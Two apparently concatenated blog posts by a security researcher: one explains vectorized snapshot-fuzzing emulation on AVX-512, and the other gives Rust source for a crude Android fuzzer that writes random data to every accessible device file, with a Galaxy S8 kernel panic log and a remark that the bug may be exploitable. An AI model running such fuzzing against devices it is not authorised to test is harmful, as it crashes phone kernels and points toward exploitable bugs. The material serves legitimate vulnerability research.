Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512 compare instructions in SIMD typically yielded all ones in a given lane if the comparision was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with in our example vpsubd. This broadcasts the memory pointed to to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Lets talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get it’s own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ than we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this load/storing to different addresses for us. This is done with a base and an offset, with 32-bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location. Now we cannot run a AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of the VM#0 and compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Lets go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Conditionally jump to end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any affect the input has on program state we can easily and cheaply detect.

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the amount of instructions which state is stored on as we only store state that was influenced by user data.

This works for code coverage as well, for example if we hit a printf with completely uncontrolled parameters that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, the performance costs of updating databases on every instruction is not feasible. By filtering only instructions which have user-influenced data we’re able to perform much more complex operations in the case that new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on it’s own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug . This is a fun one as really no tradtional fuzzer would find this as it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic “VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make lets say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this especially as if we mapped in 0x00662625 we would get to control a kernel land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Lets give that a shot!

